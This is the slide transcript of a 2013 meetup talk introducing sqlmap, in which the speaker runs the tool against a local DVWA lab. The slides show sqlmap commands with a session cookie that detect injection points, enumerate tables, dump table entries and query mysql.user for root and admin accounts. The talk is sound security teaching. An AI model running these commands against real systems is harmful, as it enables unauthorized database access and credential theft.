sqlmap 101

Transcript

1. sqlmap 101 Detect and Exploit SQL Injection Zaki Akhmad Python

   Indonesia Meetup February 23, 2013 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 1 / 31

2. About Me Zaki Akhmad (Python ID Meetup) sqlmap 101 February

   23, 2013 2 / 31

3. Zaki Akhmad Zaki Akhmad (Python ID Meetup) sqlmap 101 February

   23, 2013 3 / 31

4. Security Analyst Zaki Akhmad (Python ID Meetup) sqlmap 101 February

   23, 2013 4 / 31

5. Indonesia Chapter Leader Zaki Akhmad (Python ID Meetup) sqlmap 101

   February 23, 2013 5 / 31

6. @zakiakhmad Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23,

   2013 6 / 31

7. [email protected] 0xFD57BE80 available at pgp.mit.edu Zaki Akhmad (Python ID Meetup)

   sqlmap 101 February 23, 2013 7 / 31

8. enthusiast Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23,

   2013 8 / 31

9. SQL Injection Zaki Akhmad (Python ID Meetup) sqlmap 101 February

   23, 2013 9 / 31

10. Exploits of a Mom, XKCD #327 Zaki Akhmad (Python ID

    Meetup) sqlmap 101 February 23, 2013 10 / 31

11. SQL Injection is (mostly) about the unauthorized DBMS data access

    Miroslav Stampar, sqlmap Developer Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 11 / 31

12. SQL Injection techniques: Blind Error Union (partial and full) Time

    Stacked ... sqlmap 102 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 12 / 31

13. What’s sqlmap open source penetration testing tool that automates the

    process of detecting and exploiting SQL injection flaws and taking over of database server(s) Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 13 / 31

14. sqlmap Project Details repository web twitter contact mailing list https://github.com/sqlmapproject/sqlmap

    http://sqlmap.org @sqlmap dev at sqlmap.org sqlmap-users at lists.sourceforge.net Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 14 / 31

15. Project Statistic http://www.ohloh.net/p/sqlmap Zaki Akhmad (Python ID Meetup) sqlmap 101

    February 23, 2013 15 / 31

16. Get and Update sqlmap $ git clone https://github.com/sqlmapproject/sqlmap.git $ python

    sqlmap.py –update Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 16 / 31

17. DVWA as an Example Zaki Akhmad (Python ID Meetup) sqlmap

    101 February 23, 2013 17 / 31

18. Find the entry point $ python sqlmap.py -u http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit [13:27:54]

    [INFO] testing connection to the target url [13:27:54] [INFO] heuristics detected web page charset ’None’ sqlmap got a 302 redirect to ’http://localhost:80/dvwa/login.php’. Do you want to follow? [Y/n] Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 18 / 31

19. So, we need a cookie $ ./sqlmap.py --cookie "PHPSESSID=1gn63kn3opj97l6325h0f9sjn2; security=low"

    -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 19 / 31

20. sqlmap found SQL injection points Zaki Akhmad (Python ID Meetup)

    sqlmap 101 February 23, 2013 20 / 31

21. sqlmap fingerprinting result Zaki Akhmad (Python ID Meetup) sqlmap 101

    February 23, 2013 21 / 31

22. Retrieve DBMS current user $ python sqlmap.py -u ... –cookie

    ... –current-user [15:17:35] [INFO] fetching current user current user: ’root@localhost’ Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 22 / 31

23. Enumerate DBMS database tables $ python sqlmap.py -u ... –cookie

    ... –tables [14:45:32] [INFO] fetching tables for databases: ’dvwa, mysql’ Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 23 / 31

24. Enumerate DBMS database table Zaki Akhmad (Python ID Meetup) sqlmap

    101 February 23, 2013 24 / 31

25. Dump DBMS database table entries $ python sqlmap.py -u ...

    –cookie ... –dump DVWA Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 25 / 31

26. Dump DBMS database table entries Zaki Akhmad (Python ID Meetup)

    sqlmap 101 February 23, 2013 26 / 31

27. Contribution Feature request Configure output directory Retrieve database server IP

    address Bug [CRITICAL] unhandled exception Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 27 / 31

28. Configure output directory $ python sqlmap.py -u ... –cookie ...

    –output-dir /tmp/sqlmap Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 28 / 31

29. Retrieve database server IP address $ python sqlmap.py -u ...

    --cookie ... --sql-query= "SELECT host, user FROM mysql.user WHERE user LIKE ’%root%’ OR user LIKE ’%admin%’" SELECT host, user FROM mysql.user WHERE user LIKE ’%root%’ OR user LIKE ’%admin%’ [4]: [*] 127.0.0.1, root [*] localhost, phpmyadmin [*] localhost, root [*] zara, root Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 29 / 31

30. Reference sqlmap - security development in python, Miroslav Stampar, EuroPython

    2011 Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 30 / 31

31. .finish Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23,

    2013 31 / 31